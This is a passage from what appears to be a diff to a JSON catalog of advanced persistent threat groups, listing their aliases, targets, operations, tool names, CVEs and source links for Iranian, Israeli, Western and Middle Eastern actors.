+ ], + "operations": [ + "Mermaid" + ], + "description": null, + "tools": [], + "links": [ + "https://ti.360.com/upload/report/file/mryxdgkb20160707en.pdf" + ], + "attck_id": null, + "comment": null + }, + { + "country": "iran", + "names": [ + "ITSecTeam" + ], + "targets": [ + "One of the threat actors responsible for the denial of service attacks against U.S in 2012/2013. Three individuals associated with the group believed to be have been working on behalf of Iran's Islamic Revolutionary Guard Corps were indicted by the Justice Department in 2016." + ], + "operations": [], + "description": null, + "tools": [], + "links": [ + "https://www.washingtonpost.com/world/national-security/iran-blamed-for-cyberattacks/2012/09/21/afbe2be4-0412-11e2-9b24-ff730c7f6312_story.html", + "http://www.nytimes.com/2013/01/09/technology/online-banking-attacks-were-work-of-iran-us-officials-say.html", + "http://pastebin.com/mCHia4W5" + ], + "attck_id": "G0059", + "comment": null + }, + { + "country": "iran", + "names": [ + "Static Kitten", + "Seedworm", + "MERCURY", + "MuddyWater", + "SectorD02", + "Cobalt Ulster", + "TEMP.Zagros" + ], + "targets": [ + "individuals in Asia and the Middle East, government and defense entities in Central and Southwest Asia" + ], + "operations": [ + "BlackWater", + "Operation Quicksand" + ], + "description": null, + "tools": [ + "LaZagne", + "", + "Covicli", + "POWERSTATS", + "Thanos Ransomware", + "MoriAgent", + "PoweMuddy", + "PowGoop", + "Crackmapexec", + "ScreenConnect", + "Pudpoul" + ], + "links": [ + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/seedworm-apt-iran-middle-east", + "https://www.picussecurity.com/resource/blog/ttp-ioc-used-by-muddywater-apt-group-attacks", + "https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf", + "https://blog.talosintelligence.com/2019/05/recent-muddywater-associated-blackwater.html", + 
"https://sec0wn.blogspot.co.il/2018/03/a-quick-dip-into-muddywaters-recent.html", + "https://www.clearskysec.com/wp-content/uploads/2019/06/Clearsky-Iranian-APT-group-%E2%80%98MuddyWater%E2%80%99-Adds-Exploits-to-Their-Arsenal.pdf", + "https://www.cybercom.mil/Media/News/Article/2897570/iranian-intel-cyber-suite-of-malware-uses-open-source-tools/", + "https://www.prevailion.com/summer-mirage-2/", + "https://securelist.com/muddywaters-arsenal/90659/", + "https://www.anomali.com/blog/probable-iranian-cyber-actors-static-kitten-conducting-cyberespionage-campaign-targeting-uae-and-kuwait-government-agencies", + "https://threatrecon.nshc.net/2019/03/07/sectord02-powershell-backdoor-analysis/", + "https://www.crowdstrike.com/resources/reports/2019-crowdstrike-global-threat-report/", + "https://www.cisa.gov/uscert/ncas/alerts/aa22-055a", + "https://www.bleepingcomputer.com/news/security/microsoft-iranian-hackers-actively-exploiting-windows-zerologon-flaw/", + "https://documents.trendmicro.com/assets/white_papers/wp_new_muddywater_findings_uncovered.pdf", + "https://researchcenter.paloaltonetworks.com/2017/11/unit42-muddying-the-water-targeted-attacks-in-the-middle-east/", + "https://www.fireeye.com/blog/threat-research/2018/03/iranian-threat-group-updates-ttps-in-spear-phishing-campaign.html", + "https://www.secureworks.com/blog/business-as-usual-for-iranian-operations-despite-increased-tensions", + "https://www.telsy.com/operation-space-race-reaching-the-stars-through-professional-social-networks/", + "https://www.symantec.com/blogs/threat-intelligence/seedworm-espionage-group", + "https://sec0wn.blogspot.com/2018/02/burping-on-muddywater.html", + "https://www.clearskysec.com/operation-quicksand/", + "https://www.clearskysec.com/wp-content/uploads/2020/10/Operation-Quicksand.pdf", + "https://blog.trendmicro.com/trendlabs-security-intelligence/muddywater-resurfaces-uses-multi-stage-backdoor-powerstats-v3-and-new-post-exploitation-tools/", + 
"https://blog.trendmicro.com/trendlabs-security-intelligence/campaign-possibly-connected-muddywater-surfaces-middle-east-central-asia/" + ], + "attck_id": "G0069", + "comment": "Struggle with Kaspersky, relates to UNC3313" + }, + { + "country": "iran", + "names": [ + "Silent Librarian", + "Cobalt Dickens", + "Yellow Nabu", + "Mabna Institute", + "TA407" + ], + "targets": [ + "144 universities in the United States, 176 foreign universities in 21 countries, five federal and state government agencies in the United States, 36 private companies in the United States, 11 foreign private companies, and two international non-governmental organizations" + ], + "operations": [], + "description": null, + "tools": [], + "links": [ + "https://www.bleepingcomputer.com/news/security/iranian-hackers-create-credible-phishing-to-steal-library-access/", + "https://info.phishlabs.com/blog/silent-librarian-more-to-the-story-of-the-iranian-mabna-institute-indictment", + "https://www.secureworks.com/research/threat-profiles/cobalt-dickens", + "https://www.fbi.gov/wanted/cyber/iranian-mabna-hackers", + "https://blog.malwarebytes.com/malwarebytes-news/2020/10/silent-librarian-apt-phishing-attack/", + "https://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/", + "https://twitter.com/ClearskySec/status/977899578346430464", + "https://www.secureworks.com/blog/cobalt-dickens-goes-back-to-school-again", + "https://www.secureworks.com/blog/back-to-school-cobalt-dickens-targets-universities", + "https://www.proofpoint.com/us/threat-insight/post/seems-phishy-back-school-lures-target-university-students-and-staff" + ], + "attck_id": null, + "comment": null + }, + { + "country": "iran", + "names": [ + "DarkHydrus " + ], + "targets": [], + "operations": [], + "description": null, + "tools": [ + "RogueRobin" + ], + "links": [ + "https://docs.google.com/document/d/1oYX3uN6KxIX_StzTH0s0yFNNoHDnV8VgmVqU5WoeErc/edit#heading=h.ez428aw98bca", + 
"https://researchcenter.paloaltonetworks.com/2018/07/unit42-new-threat-actor-group-darkhydrus-targets-middle-east-government/" + ], + "attck_id": "G0079", + "comment": null + }, + { + "country": "iran", + "names": [ + "Domestic Kitten" + ], + "targets": [], + "operations": [], + "description": null, + "tools": [], + "links": [ + "https://research.checkpoint.com/2021/domestic-kitten-an-inside-look-at-the-iranian-surveillance-operations/", + "https://research.checkpoint.com/domestic-kitten-an-iranian-surveillance-operation/" + ], + "attck_id": null, + "comment": null + }, + { + "country": "iran", + "names": [ + "Leafminer", + "Flash Kitten", + "Raspite" + ], + "targets": [ + "MENA Region" + ], + "operations": [], + "description": null, + "tools": [ + "guester / Trojan.Imecab", + "Sorgu" + ], + "links": [ + "https://www.crowdstrike.com/resources/reports/2019-crowdstrike-global-threat-report/", + "https://www.dragos.com/blog/20180802Raspite.html", + "https://www.symantec.com/blogs/threat-intelligence/leafminer-espionage-middle-east" + ], + "attck_id": "G0077", + "comment": "long-running SWC campaigns from December 2016 until public disclosure in July 2018" + }, + { + "country": "iran", + "names": [ + "Gold lowell", + "Boss Spider" + ], + "targets": [], + "operations": [], + "description": null, + "tools": [ + "SamSam" + ], + "links": [ + "https://garwarner.blogspot.com/2018/11/two-iranian-hackers-charged-with-6.html", + "https://www.secureworks.com/research/samsam-ransomware-campaigns", + "https://www.justice.gov/opa/pr/two-iranian-men-indicted-deploying-ransomware-extort-hospitals-municipalities-and-public", + "https://www.crowdstrike.com/blog/an-in-depth-analysis-of-samsam-ransomware-and-boss-spider/" + ], + "attck_id": null, + "comment": "Criminal" + }, + { + "country": "iran", + "names": [ + "Iridium" + ], + "targets": [], + "operations": [ + "Citrix Hack", + "Australian Parliament Hack" + ], + "description": null, + "tools": [ + "reGeorge", + "LazyCat", + "China 
Chopper / Ckife Webshells" + ], + "links": [ + "https://www.scmagazine.com/home/security-news/apts-cyberespionage/iridium-cyberespionage-gang-behind-aussie-parliament-attacks/", + "https://www.wsj.com/articles/iran-blamed-for-cyberattack-on-australias-parliament-11550736796", + "https://www.forbes.com/sites/kateoflahertyuk/2019/03/15/who-is-resecurity-the-firm-that-named-the-iranian-group-allegedly-behind-the-citrix-hack/", + "https://www.zdnet.com/article/citrix-discloses-security-breach-of-internal-network/" + ], + "attck_id": null, + "comment": "NOTHING CONFIRMED YET" + }, + { + "country": "iran", + "names": [ + "DNSpionage", + "Oilrig" + ], + "targets": [], + "operations": [], + "description": null, + "tools": [], + "links": [], + "attck_id": null, + "comment": null + }, + { + "country": "iran", + "names": [ + "Imperial Kitten", + "APT35", + "Tortoiseshell" + ], + "targets": [ + "IT providers in Saudi Arabia" + ], + "operations": [], + "description": null, + "tools": [ + "Poison Frog", + "Infostealer/stereoversioncontrol.exe", + "Backdoor.Syskit", + "Infostealer/Sha.exe/Sha432.exe", + "get-logon-history.ps1" + ], + "links": [ + "https://www.symantec.com/blogs/threat-intelligence/tortoiseshell-apt-supply-chain", + "https://www.cyberscoop.com/saudi-arabia-hackers-it-providers-symantec/", + "https://blog.talosintelligence.com/2019/09/tortoiseshell-fake-veterans.html" + ], + "attck_id": "G0059", + "comment": "Inconclusive link to OilRig/APT34" + }, + { + "country": "iran", + "names": [ + "?" 
+ ], + "targets": [ + "Oil companies in the middle east" + ], + "operations": [ + "Bapco Attack" + ], + "description": null, + "tools": [ + "Zerocleare", + "DUSTMAN" + ], + "links": [ + "https://www.ibm.com/downloads/cas/OAJ4VZNJ?_ga=2.162718588.1703640646.1575470035-355468858.1568634484&cm_mc_uid=62832336079115590460108&cm_mc_sid_50200000=12616311575470030712", + "https://www.wired.com/story/iran-soleimani-cyberattack-hackers/" + ], + "attck_id": null, + "comment": null + }, + { + "country": "iran", + "names": [ + "Parisite", + "Pioneer Kitten", + "Fox Kitten", + "UNC757", + "Pay2key" + ], + "targets": [ + "IT, Telecommunication, Oil and Gas, Aviation, Government, and Security sectors around the world." + ], + "operations": [ + "Pay2Key" + ], + "description": null, + "tools": [ + "Invoke-SMBEnum", + "Invoke-SMBExec", + "Invoke-WMIExec", + "STSRCHECK", + "Pay2Key ransomware", + "FRPC", + "Ngrok", + "LPManager", + "Port", + "Invoke-SMBClient", + "SSHNET", + "Juicy Potato", + "Invoke-TheHash", + "SOCKET-Based Backdoor" + ], + "links": [ + "https://us-cert.cisa.gov/ncas/alerts/aa20-259a", + "https://www.crowdstrike.com/blog/who-is-pioneer-kitten/", + "https://dragos.com/blog/industry-news/the-state-of-threats-to-electric-entities-in-north-america/", + "https://www.clearskysec.com/fox-kitten/https://www.clearskysec.com/pay2kitten/" + ], + "attck_id": null, + "comment": "Overlaps with APT33, APT34 and Chafer" + }, + { + "country": "iran", + "names": [ + "Tracer KItten" + ], + "targets": [], + "operations": [], + "description": null, + "tools": [], + "links": [ + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020OverWatchNowheretoHide.pdf" + ], + "attck_id": null, + "comment": null + }, + { + "country": "iran", + "names": [ + "BlackShadow", + "Agrius" + ], + "targets": [ + "Finance, Hosting, Telecomminication, Israeli people, Academic Sector" + ], + "operations": [], + "description": "Influence Operations, Ransomware", + "tools": [ + "Apstole", + "Detbosit", + 
"Deadwood", + "IPSecHelper" + ], + "links": [ + "https://assets.sentinelone.com/sentinellabs/evol-agrius" + ], + "attck_id": null, + "comment": null + }, + { + "country": "iran", + "names": [ + "MalKamak" + ], + "targets": [], + "operations": [ + "Operation GhostShell" + ], + "description": null, + "tools": [ + "ShellClient" + ], + "links": [ + "https://www.cybereason.com/blog/operation-ghostshell-novel-rat-targets-global-aerospace-and-telecoms-firms" + ], + "attck_id": null, + "comment": null + }, + { + "country": "iran", + "names": [ + "Nemesis Kitten", + "Charming Kitten", + "DireFate" + ], + "targets": [ + "Oil and Gas, Manufacturing, Media, Telecommunications, Government" + ], + "operations": [], + "description": null, + "tools": [ + "Plink", + "FRP", + "Bitlocker", + "Shredder (wiper)" + ], + "links": [ + "https://therecord.media/iranian-hackers-behind-cox-media-group-ransomware-attack/", + "https://www.cisa.gov/uscert/ncas/alerts/aa21-321a" + ], + "attck_id": null, + "comment": null + }, + { + "country": "iran", + "names": [ + "UNC3313" + ], + "targets": [], + "operations": [], + "description": null, + "tools": [ + "GRAMDOOR", + "STARWHALE" + ], + "links": [ + "https://www.mandiant.com/resources/telegram-malware-iranian-espionage" + ], + "attck_id": null, + "comment": "Relates to MuddyWater" + }, + { + "country": "iran", + "names": [ + "DEV-0343" + ], + "targets": [ + "US & Israeli defense technology companies, Persian Gulf ports of entry, or global maritime transportation companies " + ], + "operations": [], + "description": null, + "tools": [], + "links": [ + "https://www.microsoft.com/security/blog/2021/10/11/iran-linked-dev-0343-targeting-defense-gis-and-maritime-sectors/" + ], + "attck_id": null, + "comment": null + }, + { + "country": "israel", + "names": [ + "Unit 8200" + ], + "targets": [ + "Directed at Iranian nuclear facilities" + ], + "operations": [ + "Olympic Games / Stuxnet" + ], + "description": "Stuxnet is typically introduced to the target 
environment via an infected USB flash drive.", + "tools": [ + "Stuxnet" + ], + "links": [ + "http://www.langner.com/en/wp-content/uploads/2013/11/To-kill-a-centrifuge.pdf ", + "https://archive.org/details/Stuxnet" + ], + "attck_id": null, + "comment": null + }, + { + "country": "israel", + "names": [ + "Duqu Group", + "Unit 8200" + ], + "targets": [ + "A threat actor, using a tool dubbed Duqu 2.0, targeted individuals and companies linked to the P5+1 (the five permanent member states of the UN Security Council, plus Germany), which was conducting negotiations on Iran's nuclear program. " + ], + "operations": [ + "Duqu 2.0" + ], + "description": null, + "tools": [ + "Duqu" + ], + "links": [ + "https://blog.crysys.hu/2018/03/territorial-dispute-nsas-perspective-on-apt-landscape/", + "https://securelist.com/blog/research/70504/the-mystery-of-duqu-2-0-a-sophisticated-cyberespionage-actor-returns/", + "https://securelist.com/files/2015/06/The_Mystery_of_Duqu_2_0_a_sophisticated_cyberespionage_actor_returns.pdf", + "http://www.wsj.com/articles/spy-virus-linked-to-israel-targeted-hotels-used-for-iran-nuclear-talks-1433937601" + ], + "attck_id": null, + "comment": null + }, + { + "country": "israel", + "names": [ + "Cheshire Cat", + "SunFlower", + "Flowershop", + "MoonFlower" + ], + "targets": [], + "operations": [], + "description": null, + "tools": [], + "links": [ + "https://github.com/Yara-Rules/rules/blob/master/malware/APT_CheshireCat.yar", + "https://malware-research.org/prepare-father-of-stuxnet-news-are-coming/", + "https://blog.crysys.hu/2018/03/territorial-dispute-nsas-perspective-on-apt-landscape/" + ], + "attck_id": null, + "comment": "Might be related to Duqu, Stuxnetand might attributed to Israel." 
+ }, + { + "country": "nato", + "names": [ + "GOSSIPGIRL" + ], + "targets": [], + "operations": [ + "Olympic Games / Stuxnet" + ], + "description": null, + "tools": [ + "Stuxnet", + "Gauss", + "Flame", + "Duqu", + "Miniflame" + ], + "links": [ + "https://medium.com/chronicle-blog/who-is-gossipgirl-3b4170f846c0" + ], + "attck_id": null, + "comment": "Collaborative umbrella of varioius threat actors" + }, + { + "country": "nato", + "names": [ + "Housefly", + "EQGRP", + "Equation Group", + "Tilded Team", + "Remsec" + ], + "targets": [], + "operations": [ + "Project Sauron / Strider", + "Socialist", + "Olympic Games / Stuxnet" + ], + "description": null, + "tools": [ + "EquationDrug", + "EquationLaser", + "Regin", + "TripleFantasy", + "Gauss", + "Grayfish", + "Fanny", + "RemSec", + "DoubleFantasy" + ], + "links": [ + "https://twitter.com/RedDrip7/status/1178511323954434048", + "https://securelist.com/darkuniverse-the-mysterious-apt-framework-27/94897/", + "https://web.archive.org/web/20160304022846/http://www.kaspersky.com/about/news/virus/2012/Kaspersky_Lab_and_ITU_Discover_Gauss_A_New_Complex_Cyber_Threat_Designed_to_Monitor_Online_Banking_Accounts", + "https://www.bleepingcomputer.com/news/security/longhorn-cyber-espionage-group-is-actually-the-cia/", + "https://securelist.com/analysis/publications/75533/faq-the-projectsauron-apt/", + "http://securelist.com/blog/research/67741/regin-nation-state-ownage-of-gsm-networks/", + "http://www.symantec.com/connect/blogs/strider-cyberespionage-group-turns-eye-sauron-targets", + "https://securelist.com/blog/research/68750/equation-the-death-star-of-malware-galaxy/" + ], + "attck_id": null, + "comment": "NSA, GCHQ, CSIS, ASIS, GCSB, FiveEyes, FVEY" + }, + { + "country": "nato", + "names": [ + "APT-C-39", + "Longhorn", + "Rattlesnake ", + "Lamberts" + ], + "targets": [ + "PRC" + ], + "operations": [], + "description": null, + "tools": [], + "links": [ + 
"http://securelist.com/blog/research/77990/unraveling-the-lamberts-toolkit/", + "https://securityaffairs.co/wordpress/57916/apt/longhorn-group-cia.html", + "http://blogs.360.cn/post/APT-C-39_CIA_EN.html", + "https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=7ca2e331-2209-46a8-9e60-4cb83f9602de&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments" + ], + "attck_id": null, + "comment": "CIA" + }, + { + "country": "nato", + "names": [ + "Snowglobe", + "Animal Farm" + ], + "targets": [], + "operations": [], + "description": null, + "tools": [ + "Tafacalou", + "Chocopop", + "Babar", + "Casper", + "NBot", + "Bunny", + "Dino" + ], + "links": [ + "https://securelist.com/blog/research/69114/animals-in-the-apt-farm/", + "https://blog.gdatasoftware.com/blog/article/babar-espionage-software-finally-found-and-put-under-the-microscope.html", + "http://www.cyphort.com/evilbunny-malware-instrumented-lua/", + "http://www.cyphort.com/babar-suspected-nation-state-spyware-spotlight/", + "https://motherboard.vice.com/read/meet-babar-a-new-malware-almost-certainly-created-by-france" + ], + "attck_id": null, + "comment": "Probably French origins" + }, + { + "country": "nato", + "names": [ + "Slingshot" + ], + "targets": [ + "Kenya, Yemen, Libya, Afghanistan, Iraq, Tanzania, Jordan, Mauritius, Somalia, Democratic Republic of the Congo, Turkey, Sudan and United Arab Emirates" + ], + "operations": [ + "Mikrotik Router Compromise" + ], + "description": null, + "tools": [ + "SsCB", + "Sfc2", + "ffproxy", + "GollumApp", + "Spork downloader", + "Minisling", + "Cahnadr", + "NeedleWatch", + "Slingshot" + ], + "links": [ + "https://securelist.com/apt-slingshot/84312/", + "https://www.cyberscoop.com/kaspersky-slingshot-isis-operation-socom-five-eyes/" + ], + "attck_id": null, + "comment": "US Joint Special Operations Command" + }, + { + "country": "nato", + "names": [ + "?" 
+ ], + "targets": [ + "single victim \u00e2\u0080\u0093 a diplomatic entity from a country in Central Asia" + ], + "operations": [ + "Project Tajmahal" + ], + "description": null, + "tools": [ + "full-blown spying framework consists of two packages named \u00e2\u0080\u0098Tokyo\u00e2\u0080\u0099 and \u00e2\u0080\u0098Yokohama" + ], + "links": [ + "https://securelist.com/project-tajmahal/90240/" + ], + "attck_id": null, + "comment": null + }, + { + "country": "nato", + "names": [ + "Sea Turtle" + ], + "targets": [ + "industries: Ministries of foreign affairs, Military organizations, Intelligence agencies, Prominent energy organizations in US, Libya, Egypt, Lebanon, UAE, Albania, Cyprus, Turkey, Iraq, Jordan, Syria, Armenia, Sweden" + ], + "operations": [ + "Sea Turtle" + ], + "description": null, + "tools": [ + "Drupalgeddon", + "CVE-2017-3881", + "DNS hijacking", + "CVE-2014-6271", + "CVE-2017-6736", + "CVE-2018-0296", + "CVE-2018-7600", + "CVE-2009-1151", + "CVE-2017-12617" + ], + "links": [ + "https://www.reuters.com/article/us-cyber-attack-hijack-exclusive/exclusive-hackers-acting-in-turkeys-interests-believed-to-be-behind-recent-cyberattacks-sources-idUSKBN1ZQ10X", + "https://blog.talosintelligence.com/2019/07/sea-turtle-keeps-on-swimming.html", + "https://blog.talosintelligence.com/2019/04/seaturtle.html" + ], + "attck_id": null, + "comment": "Turkish threat group" + }, + { + "country": "middle_east", + "names": [ + "Gaza cyber gang", + "Molerats", + "ALUMINUM SARATOGA", + "Gaza Hacker Team", + "MITRE: G0021" + ], + "targets": [ + "Israel, Palestine, Egypt, Saudi Arabia, United Arab Emirates, Turkey, USA. (Targeted sectors include governmental and diplomatic institutions, including embassies; companies from the aerospace and defence Industries; financial institutions; journalists; software developers.)" + ], + "operations": [ + "TopHat", + "DustySky", + "Molerats" + ], + "description": "targeted emails with malware. 
fake website with malicipretending to be a legitimate iOS management software, and linking to it in an online freelancing marketplace.", + "tools": [ + "RTFs Exploiting CVE-2017-0199", + "Scote", + "DustySky", + "Don\u00e2\u0080\u0099t Kill My Cat (DKMC)", + "NeD Worm", + "Poison Ivy" + ], + "links": [ + "http://www.clearskysec.com/molerats-iec/", + "https://www.proofpoint.com/us/blog/threat-insight/new-ta402-molerats-malware-targets-governments-middle-east", + "https://securelist.com/gaza-cybergang-updated-2017-activity", + "https://www.zscaler.com/blogs/security-research/new-espionage-attack-molerats-apt-targeting-users-middle-east", + "http://www.clearskysec.com/dustysky/", + "https://www.fireeye.com/blog/threat-research/2013/08/operation-molerats-middle-east-cyber-attacks-using-poison-ivy.html", + "https://researchcenter.paloaltonetworks.com/2018/01/unit42-the-tophat-campaign-attacks-within-the-middle-east-region-using-popular-third-party-services/", + "https://github.com/kbandla/APTnotes/raw/master/2012/Cyberattack_against_Israeli_and_Palestinian_targets.pdf", + "https://cybersecurity.att.com/blogs/labs-research/alien-labs-2019-analysis-of-threat-groups-molerats-and-apt-c-37", + "https://www.cybereason.com/blog/new-cyber-espionage-campaigns-targeting-palestinians-part-one", + "https://www.proofpoint.com/us/blog/threat-insight/ugg-boots-4-sale-tale-palestinian-aligned-espionage", + "http://pwc.blogs.com/cyber_security_updates/2016/11/molerats-theres-more-to-the-naked-eye.html", + "http://pwc.blogs.com/cyber_security_updates/2015/04/attacks-against-israeli-palestinian-interests.html", + "https://unit42.paloaltonetworks.com/molerats-delivers-spark-backdoor/", + "https://www.cybereason.com/blog/new-cyber-espionage-campaigns-targeting-palestinians-part-2-the-discovery-of-the-new-mysterious-pierogi-backdoor", + "https://securelist.com/blog/research/72283/gaza-cybergang-wheres-your-ir-team" + ], + "attck_id": null, + "comment": null + }, + { + "country": 
"middle_east", + "names": [ + "Desert Falcon", + "APT-C-23", + "APT_C_23", + "AridViper", + "Two-tailed Scorpion" + ], + "targets": [ + "Egypt, Palestine, Israel, Jordan, UAE,Israeli-based organizations in the government, transport/infrastructure, military, and academia. One organization based in Kuwait is also as one of Arid Viper\u00e2\u0080\u0099s victims." + ], + "operations": [], + "description": "spear phishing", + "tools": [], + "links": [ + "https://research.checkpoint.com/2020/hamas-android-malware-on-idf-soldiers-this-is-how-it-happened/", + "https://securelist.com/blog/incidents/77562/breaking-the-weakest-link-of-the-strongest-chain/", + "https://www.proofpoint.com/us/threat-insight/post/Operation-Arid-Viper-Slithers-Back-Into-View", + "https://unit42.paloaltonetworks.com/pymicropsia/", + "http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-operation-arid-viper.pdf", + "https://blog.trendmicro.com/trendlabs-security-intelligence/new-gnatspy-mobile-malware-family-discovered/", + "https://securelist.com/blog/research/68817/the-desert-falcons-targeted-attacks/", + "http://securityaffairs.co/wordpress/33785/cyber-crime/arid-viper-israel-sex-video.html", + "https://www.ci-project.org/blog/2017/3/4/arid-viper", + "https://blog.lookout.com/blog/2017/02/16/viperrat-mobile-apt/", + "https://blog.cyble.com/2021/09/15/apt-c-23-using-new-variant-of-android-spyware-to-target-users-in-the-middle-east/", + "https://www.threatconnect.com/blog/kasperagent-malware-campaign/", + "https://ti.360.com/upload/report/file/APTSWXLVJ8fnjoxck.pdf", + "http://blog.talosintelligence.com/2017/06/palestine-delphi.html" + ], + "attck_id": null, + "comment": "Related: Operation Advtravel" + }, + { + "country": "middle_east", + "names": [ + "Volatile Cedar", + "Lebanese Cedar" + ], + "targets": [ + "USA, Canada, UK, Turkey, Lebanon and Israel. 
Nation-state/political-group interests" + ], + "operations": [], + "description": "The modus operandi for this attacker group initially targets publicly facing web servers, with both automatic and manual vulnerability discovery. Once in control of a server, the attackers further penetrate the targeted internal network via various means, including manual online hacking as well as an automated USB infection mechanism.", + "tools": [ + "Explosive", + "Caterpillar 2" + ], + "links": [ + "http://blog.checkpoint.com/2015/03/31/volatilecedar/", + "http://www.checkpoint.com/downloads/volatile-cedar-technical-report.pdf", + "https://www.clearskysec.com/cedar/", + "https://securelist.com/sinkholing-volatile-cedar-dga-infrastructure/69421/" + ], + "attck_id": null, + "comment": "The main threat is sensitive data theft and cyber espionage" + }, + { + "country": "middle_east", + "names": [ + "Syrian Electronic Army (SEA)", + "Deadeye Jackal" + ], + "targets": [ + "Commercial, Financial, Media, Social Networking" + ], + "operations": [], + "description": null, + "tools": [ + "SeANux: Sea Shell (Basic Web Shell)", + "Executer Webshell" + ], + "links": [ + "https://www.rsaconference.com/writable/presentations/file_upload/anf-t07b-the-art-of-attribution-identifying-and-pursuing-your-cyber-adversaries_final.pdf", + "http://www.crowdstrike.com/blog/dns-lifeblood-your-domain/", + "http://blogs.360.cn/post/Syrian_Electronic_Army.html" + ], + "attck_id": null, + "comment": null + }, + { + "country": "middle_east", + "names": [ + "United Cyber Caliphate (UCC)", + "Islamic State Hacking Division", + "Cyber Caliphate Army (CCA)" + ], + "targets": [], + "operations": [], + "description": null, + "tools": [], + "links": [ + "https://en.wikipedia.org/wiki/Islamic_State_Hacking_Division", + "https://ent.siteintelgroup.com/index.php?option=com_customproperties&view=search&task=tag&bind_to_category=content:37&tagId=697" + ], + "attck_id": null, + "comment": "Pro-ISIS" + }, + { + "country": 
"middle_east", + "names": [ + "Ghost Jackal" + ], + "targets": [ + "Commercial, Energy, Financial" + ], + "operations": [], + "description": null, + "tools": [], + "links": [ + "https://www.rsaconference.com/writable/presentations/file_upload/anf-t07b-the-art-of-attribution-identifying-and-pursuing-your-cyber-adversaries_final.pdf" + ], + "attck_id": null, + "comment": null + }, + { + "country": "middle_east", + "names": [ + "Corsair Jackal" + ], + "targets": [ + "Commercial, Technology, Financial, Energy" + ], + "operations": [], + "description": null, + "tools": [], + "links": [ + "https://www.rsaconference.com/writable/presentations/file_upload/anf-t07b-the-art-of-attribution-identifying-and-pursuing-your-cyber-adversaries_final.pdf" + ], + "attck_id": null, + "comment": null + }, + { + "country": "middle_east", + "names": [ + "Extreme Jackal" + ], + "targets": [ + "Military, Government" + ], + "operations": [], + "description": null, + "tools": [], + "links": [ + "https://www.rsaconference.com/writable/presentations/file_upload/anf-t07b-the-art-of-attribution-identifying-and-pursuing-your-cyber-adversaries_final.pdf" + ], + "attck_id": null, + "comment": null + }, + { + "country": "middle_east", + "names": [ + "Electric Powder" + ], + "targets": [ + "Israel Electric Company" + ], + "operations": [ + "Electric Powder" + ], + "description": "spreading malware via fake Facebook profiles and pages, breached websites, self-hosted and cloud based websites", + "tools": [ + "keyloger", + "Downloader" + ], + "links": [ + "https://www.riskiq.com/blog/analyst/powering-threat-investigations/", + "http://www.clearskysec.com/iec/" + ], + "attck_id": null, + "comment": null + }, + { + "country": "middle_east", + "names": [ + "APT-C-23" + ], + "targets": [], + "operations": [ + "Operation Bearded Barbie" + ], + "description": null, + "tools": [ + "KASPERAGENT and MICROPSIA", + "Desert Scorpion" + ], + "links": [ + "https://blog.lookout.com/frozencell-mobile-threat", + 
"https://ti.360.net/blog/uploads/2017/09/22/f41a337e10e992f17986af386a62c7ad.pdf", + "https://blog.lookout.com/desert-scorpion-google-play", + "https://www.cyberscoop.com/hamas-spyware-desert-scorpion-apt-c-23-google-play-lookout/", + "https://www.cadosecurity.com/post/threat-group-uses-voice-changing-software-in-espionage-attempt", + "http://researchcenter.paloaltonetworks.com/2017/04/unit42-targeted-attacks-middle-east-using-kasperagent-micropsia/", + "https://www.cybereason.com/blog/operation-bearded-barbie-apt-c-23-campaign-targeting-israeli-officials" + ], + "attck_id": null, + "comment": null + }, + { + "country": "middle_east", + "names": [ + "Golden Rat", + "APT-C-27", + "Goldmouse" + ], + "targets": [], + "operations": [], + "description": null, + "tools": [], + "links": [ + "https://blog.360totalsecurity.com/en/the-sample-analysis-of-apt-c-27s-recent-attack/", + "https://securityaffairs.co/wordpress/74670/malware/apt-c-27-syria-espionage.html", + "https://ti.360.net/blog/articles/apt-c-27-(goldmouse):-suspected-target-attack-against-the-middle-east-with-winrar-exploit-en/", + "https://www.anquanke.com/post/id/94072" + ], + "attck_id": null, + "comment": null + }, + { + "country": "middle_east", + "names": [ + "Dark Caracal" + ], + "targets": [], + "operations": [], + "description": null, + "tools": [ + "Pallas Bandook CrossRAT Infected Documents " + ], + "links": [ + "https://info.lookout.com/rs/051-ESQ-475/images/Lookout_Dark-Caracal_srr_20180118_us_v.1.0.pdf" + ], + "attck_id": null, + "comment": null + }, + { + "country": "middle_east", + "names": [ + "Tempting Cedar" + ], + "targets": [ + "people in Eastern European and Middle Eastern countries" + ], + "operations": [], + "description": null, + "tools": [], + "links": [ + "https://blog.avast.com/avast-tracks-down-tempting-cedar-spyware" + ], + "attck_id": null, + "comment": null + }, + { + "country": "middle_east", + "names": [ + "?" 
+ ], + "targets": [ + "Palestinian authorities" + ], + "operations": [ + "Big Bang" + ], + "description": null, + "tools": [ + "MICROPSIA" + ], + "links": [ + "https://research.checkpoint.com/apt-attack-middle-east-big-bang/", + "https://blog.talosintelligence.com/2017/06/palestine-delphi.html" + ], + "attck_id": null, + "comment": null + }, + { + "country": "middle_east", + "names": [ + "Sandcat" + ], + "targets": [], + "operations": [], + "description": null, + "tools": [ + "CHAINSHOT", + "CVE-2018-8589", + "FinFisher/FinSpy" + ], + "links": [ + "https://securelist.com/zero-day-in-windows-kernel-transaction-manager-cve-2018-8611/89253/" + ], + "attck_id": null, + "comment": null + }, + { + "country": "middle_east", + "names": [ + "WIRTE", + "Group WITRE" + ], + "targets": [ + "people from the Palestinian authority and UAE" + ], + "operations": [], + "description": "1. Rar file with a geo-political name in Arabic, usually conerns the Palestinian Authority and Gaza 2. VBS/SCR with the same name.3. Decoy Doc contains copied content that was published by media outlet (modified content)4. 
